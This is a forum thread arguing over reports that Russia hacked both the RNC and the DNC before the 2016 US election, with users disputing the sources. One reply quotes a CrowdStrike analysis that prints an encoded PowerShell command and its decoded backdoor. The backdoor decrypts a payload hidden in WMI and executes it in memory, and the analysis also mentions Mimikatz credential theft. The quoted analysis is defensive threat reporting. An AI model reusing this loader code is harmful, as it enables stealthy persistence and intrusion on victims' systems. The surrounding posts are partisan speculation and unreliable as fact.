Report: Russia hacked RNC, but did not leak info

Just breaking today, it appears that this isn't just a DNC/Democrat thing. It appears that the Russians also targeted the Republican party prior to the election:

Intelligence agencies conclude that Republicans were also targeted ahead of election, The New York Times says, though motivation remains unclear

Well, then that makes things a bit more interesting now, doesn't it?

“We now have high confidence that they hacked the DNC and the RNC, and conspicuously released no documents” from the Republican organization, one senior administration official told The New York Times, referring to hackers allegedly working for the Russian government.

Also of note, it appears that the Republicans tried to downplay and cover up the fact that they themselves were hacked. I wonder if this is why we heard Marco Rubio issue warnings of caution about the Wikileaks documents? Didn't he say something to the effect of, "we could be next"?

Rep. Michael McCaul, the Texas Republican who is the chairman of the House Homeland Security Committee, who said on CNN in September that the RNC had been hacked by Russia, but then quickly withdrew the claim.

McCaul initially told CNN’s Wolf Blitzer “It’s important to note, Wolf, that they have not only hacked into the DNC but also into the RNC.” He added that “the Russians have basically hacked into both parties at the national level, and that gives us all concern about what their motivations are.”

Minutes later, the RNC issued a statement denying that it had been hacked. McCaul subsequently said that he had misspoken, but that it was true that “Republican political operatives” had been the target of Russian hacking. So were establishment Republicans with no ties to the campaign, including former Secretary of State Colin L. Powell.

Link

So we have Russia hacking into both parties prior to the election, but only passing stuff on the Democrats through a proxy to Wikileaks. On top of that, we also have the Republicans denying that they themselves were hacked.

Hm...makes you think, doesn't it?

Seems to me they didn't find any criminal activities then, unlike Hillary's camp.

They can't even prove the DNC was hacked by RUssia, so now we're to believe they know the RNC was too?

This makes me think FAKE NEWS!

a reply to: muSSang

So sure about that? None of us truly know what they found or didn't find...

a reply to: IgnoranceIsntBlisss

Do you want to wade through the technical information? I'll let you wade through the technical information...

The Russians need leverage.

After all , what's a puppet without strings?

a reply to: Kettu

So sure about that? None of us truly know what they found or didn't find...

More accusations......

originally posted by: IgnoranceIsntBlisss
They can't even prove the DNC was hacked by RUssia, so now we're to believe they know the RNC was too?

This makes me think FAKE NEWS!

Sure they can. Here:

At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached the network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the other. Instead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials. While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from European Council on Foreign Relations, does an excellent job outlining the highly adversarial relationship between Russia’s main intelligence services – Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one with also significant external collection and ‘active measures’ remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but also rarely share intelligence and even occasionally steal sources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations.

The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The Powershell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated command setup to run persistently, such as:

powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0A

This decodes to:

function perfCr($crTr, $data)[
$ret = $null
try[
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
]
catch[]
return $ret
]
function decrAes($encData, $key, $iv)
[
$ret = $null
try[
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
]
Catch[]
return $ret
]
function sWP($cN, $pN, $aK, $aI)
[
if($cN -eq $null -or $pN -eq $null)[return $false]
try[
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq ”)
[return]
Invoke-Expression $ex
return $true
]
catch[
return $false
]
]
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null

This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

Crowdstrike

^^Those are the people who were doing the security for the DNC and the ones who witnessed the hack.

a reply to: Kettu
Times Of Israel ? Really ? Yeah ...
Not
You gettin as bad as bad as another poster I know....
Just put ANYTHING from ANYWHERE out there as long as it is anti-Right.
How bout a source like CNN , Fox , reporting that the CIA has found this out....
It doesnt exist

Before going to believe this news immediately and spreading it, how about a bit of digging of your own to validate sources or whos corroborating this story. Which Intel agency etc... And the author of the article is called " TIMES OF ISRAEL STAFF" . No alarm bell went on before posting....

a reply to: Kettu

Dem Dems, will believe anything.

You should put this in the mud-pit where I can give a proper response!

originally posted by: Gothmog
a reply to: Kettu
Times Of Israel ? Really ? Yeah ...
Not
You gettin as bad as bad as another poster I know....
Just put ANYTHING from ANYWHERE out there as long as it is anti-Right.
How bout a source like CNN , Fox , reporting that the CIA has found this out....
It doesnt exist

What's wrong with The Times of Israel?

Because it's from Israel?

Rumor has it that the goal of the Russians is to cause as much internal, domestic turmoil as possible with the USA.

The Republican hacked documents will come....later, during Trump's term in office.

It is in Russia's playbook to install someone divisive like Trump into office, then just barley hide their hacking.

Pit the alphabets against one another, and drop more hacked docs bit by bit during Trump's presidency.

originally posted by: Kettu
one senior administration official told The New York Times

Another impeccably sourced story

originally posted by: Voiceofthemajority

originally posted by: Kettu
one senior administration official told The New York Times

Another impeccably sourced story

Indeed! I'm glad you approve!

More and more outfits are doing their own investigative journalism and coming to the same conclusions. )))

I've been saying Wikileaks is one sided for a long time.

Of course, I get dismissed by the Right.

They try to tell me there's nothing to release.

Never bought it.

This is what we call Propaganda.

Incidentally Times of Israel is the same publication that was reporting that Al-Assad had fled to some Russian warship in 2014 and that Damascus fall was imminent. Fun time for him i'm sure, if only it was true...

I think more claims like this are going to come from overseas news outlets as they start to pick up on the chatter. And more wild claims are going to emerge as well in an effort to capitalize on the 'gullibility' of the average American browsing the web.

a reply to: Annee

Wikileaks has been compromised...

There's a lot of folks right working behind the scenes on some decryption projects...

a reply to: odzeandennz

Nah, more than likely they'll just copypasta from US-based sources.

The American masses are already confused enough with all the fake news sites and blogs created by Russian state-sponsored shills and trolls out of St. Petersburg.